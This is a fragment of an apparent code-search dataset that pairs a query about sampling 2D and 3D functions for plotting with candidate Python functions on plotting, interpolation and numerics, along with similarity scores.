"def plot3d(x, y, z, savefig = True):\n\n fig = plt.figure(figsize=(12, 7))\n ax = fig.gca(projection='3d')\n\n # Plot the surface.\n surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\n\n # Customize the z axis.\n ax.zaxis.set_major_locator(LinearLocator(10))\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n\n # Add a color bar which maps values to colors.\n fig.colorbar(surf, shrink=0.5, aspect=5)\n ax.set_xlabel('Arbitary length x', fontsize = 13)\n ax.set_ylabel('Arbitary length y', fontsize = 13)\n ax.set_zlabel('Arbitary height z', fontsize = 13)\n\n try:\n fig.savefig(results_dir + savefig)\n except:\n pass\n plt.show()",
"def plot_three_functions(values, sin_values, cos_values, complex_function_values):\n\n # Cambio la escala del eje x a una trigonometrica\n # En el docstring de la funcion indico de donde copio esta funcion\n # Esta funcion ESTA COPIADA DE INTERNET como especifico en la documentacion\n set_x_axis_scale_to_pi()\n\n # Pongo un titulo al grafico\n plt.title(\"Gráfica de las tres funciones\")\n\n # En verde, con lineas discontinuas\n plt.plot(values, sin_values, \"--g\")\n\n # En negro, con lineas discontinuas\n plt.plot(values, cos_values, \"--k\")\n\n # En rojo, con lineas discontinuas\n plt.plot(values, complex_function_values, \"--r\")\n\n plt.show()\n wait_for_user_input()",
"def plot_surface_3D(self, length = 30, fps = 30, **kwargs):\n fig = utils.get_figure(scale = 3)\n ax = fig.add_subplot(111, projection = '3d')\n\n # surface_x = self.xi_1_mesh\n # surface_y = self.xi_2_mesh\n # surface_x, surface_y, surface_z = self.surface()\n xyz = self.surface()\n\n # surface_x, surface_y = np.meshgrid(surface_x, surface_y)\n\n # print(np.shape(surface_x))\n # print(np.shape(surface_y))\n # print(np.shape(surface_z))\n\n control_points_x = np.array([control_point[0] for control_point in self.control_net.values()])\n control_points_y = np.array([control_point[1] for control_point in self.control_net.values()])\n control_points_z = np.array([control_point[2] for control_point in self.control_net.values()])\n\n # x_min = min(np.min(surface_x), np.min(control_points_x))\n # x_max = max(np.max(surface_x), np.max(control_points_x))\n # x_range = np.abs(x_max - x_min)\n #\n # y_min = min(np.min(surface_y), np.min(control_points_y))\n # y_max = max(np.max(surface_y), np.max(control_points_y))\n # y_range = np.abs(y_max - y_min)\n #\n # z_min = min(np.min(surface_z), np.min(control_points_z))\n # z_max = max(np.max(surface_z), np.max(control_points_z))\n # z_range = np.abs(z_max - z_min)\n #\n # ax.set_xlim(x_min - 0.05 * x_range, x_max + 0.05 * x_range)\n # ax.set_ylim(y_min - 0.05 * y_range, y_max + 0.05 * y_range)\n # ax.set_zlim(z_min - 0.05 * z_range, z_max + 0.05 * z_range)\n\n ax.scatter(control_points_x, control_points_y, control_points_z, depthshade = False, **CONTROL_POLYGON_KWARGS)\n\n # print(np.max(surface_x), np.max(surface_y), np.max(surface_z))\n # print(np.min(surface_x), np.min(surface_y), np.min(surface_z))\n # print(surface_x)\n # print(surface_y)\n # print(surface_z)\n xyz = np.reshape(xyz, (-1, 3))\n print(xyz.shape)\n x, y, z = xyz[:, 0], xyz[:, 1], xyz[:, 2]\n ax.scatter(x, y, z)\n # ax.plot_trisurf(\n # x, y, z,\n # cmap = plt.get_cmap('viridis'),\n # linewidth = 0,\n # antialiased = True,\n # )\n # ax.plot_surface(surface_x, surface_y, surface_z, rstride = 1, cstride = 1)\n # ax.plot_trisurf(surface_x, surface_y, surface_z)\n # ax.plot_trisurf(surface_x, surface_y, surface_z, **CURVE_KWARGS)\n\n ax.axis('off')\n\n ax.view_init(elev = 45, azim = 0) # note that this resets ax.dist to 10, so we can't use it below\n ax.dist = 7.5 # default is 10, so zoom in a little because there's no axis to take up the rest of the space\n\n plt.show()\n utils.save_current_figure(**kwargs)\n\n ### ANIMATION ###\n\n frames = length * fps\n\n writer = anim.writers['ffmpeg'](fps = fps, bitrate = 2000) # don't need a very high bitrate\n\n def animate(frame):\n print(frame, frames, frame / frames)\n ax.azim = 360 * frame / frames # one full rotation\n return [] # must return the list of artists we modified (i.e., nothing, since all we did is rotate the view)\n\n ani = anim.FuncAnimation(fig, animate, frames = frames, blit = True)\n ani.save(f\"{os.path.join(kwargs['target_dir'], kwargs['name'])}.mp4\", writer = writer)\n\n plt.close()",
"def prob3(N):\n x, y, n = sy.symbols('x, y, n')\n expr = sy.summation(x**n/sy.factorial(n), (n, 0, N))\n f = sy.lambdify(y, expr.subs(x, -y**2), \"numpy\")\n domain = np.linspace(-2, 2, 100)\n plt.ion()\n plt.plot(domain, np.exp(-1*domain**2), label=\"original function\")\n plt.plot(domain, f(domain), label=\"Maclaurin series\")\n plt.legend()\n plt.show()",
"def interpolate(x_list, y_list, z_list):\n x1 = x_list[-2]\n x2 = x_list[-1]\n y1 = y_list[-2]\n y2 = y_list[-1]\n z1 = z_list[-2]\n z2 = z_list[-1]\n r = -y1/y2\n x_land = (x1+r*x2)/(r+1)\n z_land = (z1+r*z2)/(r+1)\n x_list[-1] = x_land\n y_list[-1] = 0.0\n z_list[-1] = z_land",
"def test_data():\n x = np.array([8, 67, 79, 10, 52, 53, 98, 34, 15, 58], dtype=float)\n y = np.array([24, 87, 48, 94, 98, 66, 14, 24, 60, 16], dtype=float)\n z = np.array([0.064, 4.489, 6.241, 0.1, 2.704, 2.809, 9.604, 1.156,\n 0.225, 3.364], dtype=float)\n\n return x, y, z",
"def plot_3x3_hists(self, skip_obs=None, n_bins=40):\n\n return self.plot_nxn_hists(n=3, skip_obs=skip_obs, n_bins=n_bins)",
"def get3d(infile, histname, subdir='',verbose=False): \n\n ## 2d Histogram\n Hist = getter(infile,histname,subdir,verbose)\n\n nbinsX, nbinsY, nbinsZ = Hist.GetNbinsX(), Hist.GetNbinsY(), Hist.GetNbinsZ()\n Arr = np.zeros((nbinsZ,nbinsY,nbinsX))\n dArr = np.zeros((nbinsZ,nbinsY,nbinsX))\n axesX = np.zeros(nbinsX)\n axesY = np.zeros(nbinsY)\n axesZ = np.zeros(nbinsZ)\n edgesX = np.zeros(nbinsX+1)\n edgesY = np.zeros(nbinsY+1)\n edgesZ = np.zeros(nbinsZ+1)\n for j in xrange(0,nbinsX):\n axesX[j] = Hist.GetXaxis().GetBinCenter(j+1)\n edgesX[j] = Hist.GetXaxis().GetBinLowEdge(j+1)\n edgesX[nbinsX] = Hist.GetXaxis().GetBinLowEdge(nbinsX+1)\n\n for j in xrange(0,nbinsY):\n axesY[j] = Hist.GetYaxis().GetBinCenter(j+1)\n edgesY[j] = Hist.GetYaxis().GetBinLowEdge(j+1)\n edgesY[nbinsY] = Hist.GetYaxis().GetBinLowEdge(nbinsY+1)\n\n for j in xrange(0,nbinsZ):\n axesZ[j] = Hist.GetZaxis().GetBinCenter(j+1)\n edgesZ[j] = Hist.GetZaxis().GetBinLowEdge(j+1)\n edgesZ[nbinsZ] = Hist.GetZaxis().GetBinLowEdge(nbinsZ+1)\n\n axes = [axesX, axesY, axesZ]\n edges = [edgesX, edgesY, edgesZ]\n \n for j in xrange(0,nbinsX):\n for k in xrange(0,nbinsY):\n for l in xrange(0,nbinsZ):\n Arr[l,k,j] = Hist.GetBinContent(j+1,k+1,l+1)\n dArr[l,k,j] = Hist.GetBinError(j+1,k+1,l+1)\n \n return axes, edges, Arr, dArr",
"def testing_fixed_point_newton_interp(fixed_point_functions, n, m=400):\n\n # Function to convert to root finding problem given g(x). 'g(x*) = x*' -> 'f(x*) = 0'\n Ffun = lambda Gfun: lambda x: Gfun(x) -x\n\n import matplotlib.pylab as plt\n\n # setting up figure\n num_plots = len(fixed_point_functions)\n\n fig, axs = plt.subplots(1, num_plots, figsize=(15, 6), facecolor='w', edgecolor='k')\n fig.subplots_adjust(hspace = .5, wspace=.001)\n axs = axs.ravel()\n\n i = 0 # 'graph number'\n for Gfun_name, Gfun in fixed_point_functions.items():\n\n # <computation block>\n\n # convert to root finding problem\n f = Ffun(Gfun)\n\n # compute x and y data points\n x = np.linspace(-1,1,n)\n y = f(x)\n\n # compute coefficients of interpolating polynomial\n c = coeffients(x,y)\n\n # evaluate actual function points for graph\n ax = np.linspace(-1,1,m)\n ay = f(ax)\n\n # calculate y values using the interpolating polynomials coefficients\n y_hats = []\n for xi in ax:\n y_hati = np.polyval(c, xi)\n y_hats.append(y_hati)\n\n # <\\computation block>\n\n # create plot for this function\n axs[i].plot( ax, ay, 'k' ) # function in black\n axs[i].plot( ax, y_hats, 'r' ) # interpolating polynomial in red\n axs[i].set_title(Gfun_name)\n\n # increment graph number\n i += 1\n\n plt.show()",
"def get_data_args(data_func, nfuncs):\n if data_func.__name__ == 'gg_1d':\n # first arg is sorted\n if nfuncs == 1:\n data_args = [{'a': 0.75, 'mu': 0.4, 'sigma': 0.3, 'beta': 2.0}]\n elif nfuncs == 2:\n data_args = [{'a': 0.2, 'mu': 0.4, 'sigma': 0.6, 'beta': 5.0},\n {'a': 0.55, 'mu': 0.4, 'sigma': 0.2, 'beta': 4.0}]\n elif nfuncs == 3:\n data_args = [{'a': 0.2, 'mu': 0.4, 'sigma': 0.6, 'beta': 5.0},\n {'a': 0.35, 'mu': 0.6, 'sigma': 0.07, 'beta': 2.0},\n {'a': 0.55, 'mu': 0.32, 'sigma': 0.14, 'beta': 6.0}]\n elif nfuncs == 4:\n data_args = [{'a': 0.2, 'mu': 0.3, 'sigma': 0.5, 'beta': 5.0},\n {'a': 0.4, 'mu': 0.65, 'sigma': 0.07, 'beta': 2.0},\n {'a': 0.6, 'mu': 0.25, 'sigma': 0.1, 'beta': 6.0},\n {'a': 0.9, 'mu': 0.95, 'sigma': 0.1, 'beta': 6.0}]\n elif data_func.__name__ == 'ta_1d':\n # first arg is sorted\n if nfuncs == 1:\n data_args = [{'a': 0.8, 'w_0': 0.0, 'w_1': 1.5}]\n elif nfuncs == 2:\n data_args = [{'a': 0.7, 'w_0': -1, 'w_1': 3},\n {'a': 0.9, 'w_0': 2, 'w_1': -3}]\n elif nfuncs == 3:\n data_args = [\n {'a': 0.6, 'w_0': -7, 'w_1': 8},\n {'a': 1, 'w_0': -1, 'w_1': 3},\n {'a': 1.4, 'w_0': 2, 'w_1': -3}]\n elif data_func.__name__ == 'gg_2d':\n # the order is (with first arg sorted):\n # [a_1, mu1_1, mu2_1, s1_1, s2_1, b1_1, b2_1, rot angle]\n if nfuncs == 1:\n data_args = [\n {'a': 0.8, 'mu1': 0.6, 'mu2': 0.6, 'sigma1': 0.1,\n 'sigma2': 0.2, 'beta1': 2, 'beta2': 2, 'omega': 0.1 * np.pi}]\n elif nfuncs == 2:\n data_args = [\n {'a': 0.5, 'mu1': 0.5, 'mu2': 0.4, 'sigma1': 0.4,\n 'sigma2': 0.2, 'beta1': 2, 'beta2': 2, 'omega': 0},\n {'a': 0.8, 'mu1': 0.5, 'mu2': 0.6, 'sigma1': 0.1,\n 'sigma2': 0.1, 'beta1': 2, 'beta2': 2, 'omega': 0}]\n elif nfuncs == 3:\n data_args = [\n {'a': 0.5, 'mu1': 0.3, 'mu2': 0.7, 'sigma1': 0.2,\n 'sigma2': 0.2, 'beta1': 2, 'beta2': 2, 'omega': 0},\n {'a': 0.7, 'mu1': 0.7, 'mu2': 0.6, 'sigma1': 0.15,\n 'sigma2': 0.15, 'beta1': 2, 'beta2': 2, 'omega': 0},\n {'a': 0.9, 'mu1': 0.4, 'mu2': 0.3, 'sigma1': 0.1,\n 'sigma2': 0.1, 'beta1': 2, 'beta2': 2, 'omega': 0}]\n try:\n data_args_list = []\n for name in bf.get_bf_param_names(data_func):\n data_args_list += [d[name] for d in data_args]\n return data_args_list\n except NameError:\n raise AssertionError('no data args found! func={} nfuncs={}'.format(\n data_func.__name__, nfuncs))",
"def plotSlider3D(x, y, z, value, levels=25, title=\"Title\", xlab=\"x-axis\", ylab=\"y-axis\"):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n fig.subplots_adjust(left=0.25, bottom=0.25)\n\n C = ax.contourf(x, y, value[:,:,0], levels, cmap=plt.cm.inferno)\n ax.title(title)\n ax.xlabel(xlab)\n ax.ylabel(ylab)\n\n z_slider_ax = fig.add_axes([0.25, 0.1, 0.65, 0.03], axisbg=axis_color)\n z_slider = Slider(z_slider_ax, 'z-axis', 0, 30.0, valinit=freq_0)\n def sliders_on_changed(val):\n ax.contourf(x, y, value[:,:,val],levels)\n fig.canvas.draw_idle()\n z_slider.on_changed(sliders_on_changed)",
"def test_surf():\n def f(x, y):\n sin, cos = numpy.sin, numpy.cos\n return sin(x + y) + sin(2 * x - y) + cos(3 * x + 4 * y)\n\n x, y = numpy.mgrid[-7.:7.05:0.1, -5.:5.05:0.05]\n s = surf(x, y, f)\n mlab.show()\n #cs = contour_surf(x, y, f, contour_z=0)\n return",
"def immoment3D(X, Y, Z, p, q, r):\n assert len(X) == len(Y)\n assert len(Y) == len(Z)\n return (X ** p * Y ** q * Z ** r).sum()",
"def plot_3d(self, ax_3d: Axes3D, n_angles: int = 30, **kwargs) -> None:\n X, Y, Z = self.to_mesh(n_angles)\n\n ax_3d.plot_surface(X, Y, Z, **kwargs)",
"def vector_3d_magnitude(x, y, z):\n return math.sqrt((x * x) + (y * y) + (z * z))",
"def monte_carlo_sample(f, bounds, n_samples):\r\n samples = []\r\n pmax = f(bounds[0])\r\n tries_per_run = int(n_samples*1/pmax)\r\n while len(samples) < n_samples:\r\n x = np.random.rand(tries_per_run)*(bounds[1]-bounds[0])+bounds[0]\r\n y = np.random.rand(tries_per_run)*pmax\r\n good = x[y <= f(x)]\r\n samples = samples + [i for i in x[y <= f(x)]]\r\n return np.array(np.array(samples))[:n_samples]",
"def ijarr2xyz(ijarr2xy_func: Callable, xy2z_func: Callable, i: float, j: float) -> Tuple[float, float, float]:\n\n x, y = ijarr2xy_func(i, j)\n z = xy2z_func(x, y)\n return x, y, z",
"def contour3d(gto, ix=0, m=0, n=100, lower=[-2, -2, -2], upper=[2, 2, 2], contours=5):\n X, Y, Z = np.mgrid[-3:3:150j, -3:3:150j, -3:3:150j] # <- TODO\n f = gto.compute(X, Y, Z, i=ix, m=m)\n logging.debug(f\"Contour min: {np.min(f)}, max: {np.max(f)}\")\n mlab.contour3d(X, Y, Z, f, contours=contours, colormap='cool', transparent=True)",
"def InterpolateFunctions(self, , p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=...):\n ...",
"def generate_data(values, function=non_linear_fn, length=25, range_=[-1, 1]):\n\n # build x vector\n x = np.linspace(range_[0], range_[1], length)\n\n data = np.zeros((values.shape[0], length))\n\n for i in range(values.shape[0]):\n data[i, :] = function(x, values[i, 0], values[i, 1], values[i, 2])\n\n return data",
"def function2D(self, t):\n if t.ndim == 1:\n nX = int(self.getAttributeValue('nX'))\n nY = int(self.getAttributeValue('nY'))\n pos = t.reshape(nX, nY, 2)\n elif t.ndim == 3:\n pos = t\n X = pos[...,0]\n Y = pos[...,1]\n A = self.getParamValue(0)\n muX = self.getParamValue(1)\n muY = self.getParamValue(2)\n sigX = self.getParamValue(3)\n sigY = self.getParamValue(4)\n sigP = self.getParamValue(5)\n bg = self.getParamValue(6)\n\n sigXY = sigX*sigY*sigP\n Z = A*bivariate_normal(X,Y, sigmax=sigX, sigmay=sigY,\n mux=muX,muy=muY,sigmaxy=sigXY)\n Z += bg\n return Z",
"def zzX_abs(f):\n if poly_univariate_p(f):\n return zzx_abs(f)\n else:\n return [ zzX_abs(coeff) for coeff in f ]",
"def Compute3d(self, *args):\n return _BRepAlgo.BRepAlgo_NormalProjection_Compute3d(self, *args)",
"def eval_func_on_grid(f, re, im, N):\n l = re[1] - re[0]\n h = im[1] - im[0]\n resL = N*l #horizontal resolution\n resH = N*h #vertical resolution\n x = np.linspace(re[0], re[1],resL)\n y = np.linspace(im[0], im[1], resH)\n x, y = np.meshgrid(x,y)\n z = x + 1j*y\n w = f(z)\n return w",
"def display3(*args):\n #-------------------- unpack\n twiss_fun = args[0]\n cos_like = args[1]\n sin_like = args[2]\n lat_plot = args[3]\n ape_plot = args[4]\n #-------------------- sigma functions\n # zero = [0. for i in range(sigma_fun.nbpoints)] # zero line\n z = [twiss_fun(i,'s') for i in range(twiss_fun.nbpoints)] # Abszisse\n sgx = [twiss_fun(i,'sigx')*1.e3 for i in range(twiss_fun.nbpoints)] # envelope (sigma-x)\n sgy = [twiss_fun(i,'sigy')*1.e3 for i in range(twiss_fun.nbpoints)] # envelope (sigma-y)\n #-------------------- trajectories\n z1= [cos_like(i,'s') for i in range(cos_like.nbpoints)]\n cx= [cos_like(i,'cx')*1.e3 for i in range(cos_like.nbpoints)]\n # cxp= [cos_like(i,'cxp')*1.e3 for i in range(cos_like.nbpoints)]\n cy= [cos_like(i,'cy')*1.e3 for i in range(cos_like.nbpoints)]\n # cyp= [cos_like(i,'cyp')*1.e3 for i in range(cos_like.nbpoints)]\n cz= [cos_like(i,'cz') for i in range(cos_like.nbpoints)]\n cdp= [cos_like(i,'cdp') for i in range(cos_like.nbpoints)]\n\n z2= [sin_like(i,'s') for i in range(sin_like.nbpoints)]\n sx= [sin_like(i,'sx')*1.e3 for i in range(sin_like.nbpoints)]\n # sxp= [sin_like(i,'sxp')*1.e3 for i in range(sin_like.nbpoints)]\n sy= [sin_like(i,'sy')*1.e3 for i in range(sin_like.nbpoints)]\n # syp= [sin_like(i,'syp')*1.e3 for i in range(sin_like.nbpoints)]\n sz= [sin_like(i,'sz') for i in range(sin_like.nbpoints)]\n sdp= [sin_like(i,'sdp') for i in range(sin_like.nbpoints)]\n #-------------------- lattice viseo\n vzero = [0. for i in range(lat_plot.nbpoints)] # zero line\n vis_abszisse = [lat_plot(i,'s') for i in range(lat_plot.nbpoints)]\n vis_ordinate = [lat_plot(i,'viseo') for i in range(lat_plot.nbpoints)]\n ape_abszisse = [ape_plot(i,'s') for i in range(ape_plot.nbpoints)]\n ape_ordinate = [ape_plot(i,'aperture')*1.e3 for i in range(ape_plot.nbpoints)]\n #-------------------- figure frame\n width=14; height=7.6\n # fighdr = 'lattice version = {}, input file = {}'.format(PARAMS['lattice_version'],PARAMS['input_file'])\n fig = plt.figure(num=1,figsize=(width,height),facecolor='#eaecef',tight_layout=False)\n\n #-------------------- transverse X tracks\n splot311=plt.subplot(311)\n # splot311=plt.subplot(10,1,(1,3))\n splot311.set_title('transverse x')\n # mapping box\n splot311.text(0.01, 1.1,UTIL.FLAGS.get('mapping'),transform=splot311.transAxes,fontsize=8,bbox=dict(boxstyle='round',facecolor='wheat',alpha=0.5),verticalalignment='top')\n if UTIL.FLAGS['envelope']:\n plt.plot(z,sgx ,label=r'$\\sigma$ [mm]',color='green')\n plt.plot(z1,cx, label=\"C [mm]\",color='blue',linestyle='-')\n # plt.plot(z1,cxp,label=\"C' [mr]\",color='blue',linestyle=':')\n plt.plot(z2,sx, label=\"S [mm]\",color='red' ,linestyle='-')\n # plt.plot(z2,sxp,label=\"S' [mr]\",color='red' ,linestyle=':')\n vscale=splot311.axis()[3]*0.25\n viseoz = [x*vscale for x in vis_ordinate]\n plt.plot(vis_abszisse,viseoz,label='',color='black')\n plt.plot(vis_abszisse,vzero,color='green',linestyle='--')\n # apertures\n if UTIL.FLAGS['useaper']:\n plt.plot(ape_abszisse,ape_ordinate,linestyle='-.')\n N = UTIL.PARAMS['nbsigma']\n sgx = [i*N for i in sgx]\n #label = F'{N:1}$\\sigma$ [mm]'\n label = '{:1}$\\sigma$ [mm]'.format(N)\n plt.plot(z,sgx ,label=label,color='green',linestyle=':')\n # zero line\n splot311.plot(vis_abszisse,vzero,color='green',linestyle='--')\n plt.legend(loc='lower right',fontsize='x-small')\n\n #-------------------- transverse Y tracks\n splot312=plt.subplot(312)\n # splot312=plt.subplot(10,1,(4,6))\n splot312.set_title('transverse y')\n if UTIL.FLAGS['envelope']:\n plt.plot(z,sgy ,label=r'$\\sigma$ [mm]',color='green')\n plt.plot(z1,cy, label=\"C [mm]\",color='blue',linestyle='-')\n # plt.plot(z1,cyp,label=\"C' [mr]\",color='blue',linestyle=':')\n plt.plot(z2,sy, label=\"S [mm]\",color='red' ,linestyle='-')\n vscale=splot312.axis()[3]*0.25\n viseoz = [x*vscale for x in vis_ordinate]\n plt.plot(vis_abszisse,viseoz,label='',color='black')\n plt.plot(vis_abszisse,vzero,color='green',linestyle='--')\n # apertures\n if UTIL.FLAGS['useaper']:\n plt.plot(ape_abszisse,ape_ordinate,linestyle='-.')\n N = UTIL.PARAMS['nbsigma']\n sgy = [i*N for i in sgy]\n plt.plot(z,sgy ,label=label,color='green',linestyle=':')\n # zero line\n splot312.plot(vis_abszisse,vzero,color='green',linestyle='--')\n plt.legend(loc='lower right',fontsize='x-small')\n\n #-------------------- longitudinal tracks z, dP/P\n # ax_l = left abszisse\n ax_l=plt.subplot(313)\n # ax_l=plt.subplot(10,1,(7,9))\n ax_l.set_title('longitudinal')\n ax_l.set_ylabel(r\"z [mm]\")\n ax_l.tick_params(axis='y', colors='green')\n ax_l.yaxis.label.set_color('green')\n ax_l.plot(z1,cz,label='C',color='green')\n ax_l.plot(z2,sz,label='S',color='green',linestyle=':')\n plt.legend(loc='lower left',fontsize='x-small')\n # ax_r = right abszisse\n ax_r = ax_l.twinx()\n ax_r.set_ylabel(r'$\\Delta$p/p [%]')\n ax_r.tick_params(axis='y', colors='red')\n ax_r.yaxis.label.set_color('red')\n ax_r.plot(z1,cdp,label='C',color='red')\n ax_r.plot(z2,sdp,label='S',color='red',linestyle=':')\n ax_r.plot(vis_abszisse,vzero,color='red', linestyle='--')\n plt.legend(loc='lower right',fontsize='x-small')\n # lattice elements\n vscale=ax_l.axis()[3]*0.25\n viseoz = [x*vscale for x in vis_ordinate]\n ax_l.plot(vis_abszisse,viseoz,label='',color='black')\n ax_l.plot(vis_abszisse,vzero,color='green',linestyle='--')",
"def test_interpolating_y_3d(name, ipset_y_3d):\n if name in (\"lagrange\",):\n pytest.skip(f\"Method {name} does not support 3-dimensional data\")\n\n y_new = interpolation.interpolate(*ipset_y_3d, kind=name, **IPARGS.get(name, {}))\n assert y_new.ndim == 3",
"def list_plot3d(v, interpolation_type='default', texture=\"automatic\", point_list=None, **kwds):\n import numpy\n if texture == \"automatic\":\n texture = \"lightblue\"\n if is_Matrix(v):\n if interpolation_type == 'default' or interpolation_type == 'linear' and 'num_points' not in kwds:\n return list_plot3d_matrix(v, texture=texture, **kwds)\n else:\n l = []\n for i in range(v.nrows()):\n for j in range(v.ncols()):\n l.append((i, j, v[i, j]))\n return list_plot3d_tuples(l, interpolation_type, texture, **kwds)\n\n if isinstance(v, numpy.ndarray):\n return list_plot3d(matrix(v), interpolation_type, texture, **kwds)\n\n if isinstance(v, list):\n if len(v) == 0:\n # return empty 3d graphic\n from .base import Graphics3d\n return Graphics3d()\n elif len(v) == 1:\n # return a point\n from .shapes2 import point3d\n return point3d(v[0], **kwds)\n elif len(v) == 2:\n # return a line\n from .shapes2 import line3d\n return line3d(v, **kwds)\n elif isinstance(v[0], tuple) or point_list == True and len(v[0]) == 3:\n return list_plot3d_tuples(v, interpolation_type, texture=texture, **kwds)\n else:\n return list_plot3d_array_of_arrays(v, interpolation_type, texture, **kwds)\n raise TypeError(\"v must be a matrix or list\")",
"def Values(self, *args):\n return _Adaptor3d.Adaptor3d_InterFunc_Values(self, *args)",
"def interp_nd(z, x, fx, dfx=None, y=None, fpy=None, dfpy=None, \\\n compute_dfz=False, order_set=None):\n # verifying and handling arguments\n d, n = z.shape[1], x.shape[0]\n assert x.shape == (n,d) and fx.shape == (n,)\n if dfx is None:\n dfx = zeros(fx.shape)\n else:\n assert dfx.shape == (n,)\n if y is None:\n assert fpy is None and dfpy is None\n m = 0; y = zeros([0,d]); fpy = zeros([0,d]); dfpy = zeros([0,d])\n else:\n m = y.shape[0]\n assert fpy is not None and fpy.shape == (m,d)\n if dfpy is None:\n dfpy = zeros(fpy.shape)\n else:\n assert dfpy.shape == (m,d)\n # determine expansion order set, its boundary set and zeta\n if order_set is None:\n k = 0; order_set = []\n while len(order_set) < min(n + m*d, 100):\n k += 1\n order_set = max_order_set(d, k)\n else:\n assert len(order_set) > 1 and order_set[0] == (0,)*d\n boundary_set, boundary_zeta = boundary_set_and_zeta(order_set)\n # calculate beta and gamma\n t0 = time.time()\n beta = calc_beta(fx, dfx)\n gamma = calc_gamma_nd(x, fx, dfx, y, fpy, dfpy, \\\n order_set, boundary_set, boundary_zeta)\n print 'time: ', time.time() - t0\n # interpolation for each z[i]\n t0 = time.time()\n fz, dz = [], []\n for zi in z:\n a, b, er2 = interp_nd_coef(zi, x, dfx, y, dfpy, beta, gamma, \\\n order_set, boundary_set, boundary_zeta)\n fz.append(dot(a, fx) + (b*fpy).sum())\n dz.append(sqrt(er2))\n print 'time: ', time.time() - t0\n if compute_dfz:\n return numpy.array(fz), numpy.array(dz)\n else:\n return numpy.array(fz)"
] | [
"0.6324257",
"0.61952674",
"0.60081536",
"0.6003968",
"0.59578633",
"0.5772959",
"0.5612362",
"0.55938494",
"0.5529308",
"0.552768",
"0.5526545",
"0.55223507",
"0.55000556",
"0.5411602",
"0.54069936",
"0.53909606",
"0.5389578",
"0.53585124",
"0.5356868",
"0.53406954",
"0.53343284",
"0.53251106",
"0.5310632",
"0.5283576",
"0.52764714",
"0.52738726",
"0.5269587",
"0.5254057",
"0.525168",
"0.52485824",
"0.5239377",
"0.52253264",
"0.52041084",
"0.5196755",
"0.5195193",
"0.51626784",
"0.51538",
"0.514509",
"0.5142268",
"0.5139996",
"0.5139516",
"0.51353294",
"0.5126034",
"0.512129",
"0.5117012",
"0.51162624",
"0.5116102",
"0.5104233",
"0.50901836",
"0.5088489",
"0.50852156",
"0.50682527",
"0.5065151",
"0.50559133",
"0.50543976",
"0.50379807",
"0.50342256",
"0.5017699",
"0.5017126",
"0.5004723",
"0.50032216",
"0.49910033",
"0.49889168",
"0.49842384",
"0.4978023",
"0.49570096",
"0.49515083",
"0.49445394",
"0.49439746",
"0.49378085",
"0.49366647",
"0.49263766",
"0.49180084",
"0.4914137",
"0.4913917",
"0.49065524",
"0.49058414",
"0.48925197",
"0.48917925",
"0.4889043",
"0.48879376",
"0.48832774",
"0.48820192",
"0.48661828",
"0.48649803",
"0.4861394",
"0.48567602",
"0.4856155",
"0.48517266",
"0.4842139",
"0.4839789",
"0.48341003",
"0.48338127",
"0.4832594",
"0.48291874",
"0.48270172",
"0.48153317",
"0.47979856",
"0.47934785",
"0.47866303"
] | 0.8300914 | 0 |
Samples a 2d or 3d function over specified intervals and returns a dataset suitable for plotting with matlab (matplotlib) syntax. Wrapper for sample2d and sample3d. f is a function of one or two variables, such as x2. var_args are intervals for each variable given in the form (var, min, max, n) | def sample(f, *var_args):
if len(var_args) == 1:
return sample2d(f, var_args[0])
elif len(var_args) == 2:
return sample3d(f, var_args[0], var_args[1])
else:
raise ValueError("Only 2d and 3d sampling are supported at this time.") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def sample3d(f, x_args, y_args):\n x, x_min, x_max, x_n = None, None, None, None\n y, y_min, y_max, y_n = None, None, None, None\n try:\n f = sympify(f)\n except SympifyError:\n raise ValueError(\"f could not be interpreted as a SymPy function\")\n try:\n x, x_min, x_max, x_n = x_args\n y, y_min, y_max, y_n = y_args\n except (TypeError, IndexError):\n raise ValueError(\"x_args and y_args must be tuples of the form (var, min, max, intervals)\")\n\n x_l = float(x_max - x_min)\n x_d = x_l/float(x_n)\n x_a = np.arange(float(x_min), float(x_max) + x_d, x_d)\n\n y_l = float(y_max - y_min)\n y_d = y_l/float(y_n)\n y_a = np.arange(float(y_min), float(y_max) + y_d, y_d)\n\n def meshgrid(x, y):\n \"\"\"\n Taken from matplotlib.mlab.meshgrid.\n \"\"\"\n x = np.array(x)\n y = np.array(y)\n numRows, numCols = len(y), len(x)\n x.shape = 1, numCols\n X = np.repeat(x, numRows, 0)\n\n y.shape = numRows, 1\n Y = np.repeat(y, numCols, 1)\n return X, Y\n\n X, Y = np.meshgrid(x_a, y_a)\n\n Z = np.ndarray((len(X), len(X[0])))\n for j in range(len(X)):\n for k in range(len(X[0])):\n try:\n Z[j][k] = float(f.subs(x, X[j][k]).subs(y, Y[j][k]))\n except (TypeError, NotImplementedError):\n Z[j][k] = 0\n return X, Y, Z",
"def sample2d(f, x_args):\n try:\n f = sympify(f)\n except SympifyError:\n raise ValueError(\"f could not be interpreted as a SymPy function\")\n try:\n x, x_min, x_max, x_n = x_args\n except (TypeError, IndexError):\n raise ValueError(\"x_args must be a tuple of the form (var, min, max, n)\")\n\n x_l = float(x_max - x_min)\n x_d = x_l/float(x_n)\n X = np.arange(float(x_min), float(x_max) + x_d, x_d)\n\n Y = np.empty(len(X))\n for i in range(len(X)):\n try:\n Y[i] = float(f.subs(x, X[i]))\n except TypeError:\n Y[i] = None\n return X, Y",
"def __create_sample_data__(npts = 20):\n\t#data function\n\tdef wavy(x, y):\n\t\treturn np.sin(0.2*np.pi*x)*np.cos(0.4*np.pi*y)\n\t\n\t#make grid\n\txs = np.linspace(0, 2*20, 2*npts + 1)\n\tys = np.linspace(0, 20, npts + 1)\n\t(xgrid, ygrid) = np.meshgrid(xs, ys)\n\tzgrid = wavy(xgrid, ygrid)\n\t\n\treturn (xgrid, ygrid, zgrid)",
"def generate_data(values, function=non_linear_fn, length=25, range_=[-1, 1]):\n\n # build x vector\n x = np.linspace(range_[0], range_[1], length)\n\n data = np.zeros((values.shape[0], length))\n\n for i in range(values.shape[0]):\n data[i, :] = function(x, values[i, 0], values[i, 1], values[i, 2])\n\n return data",
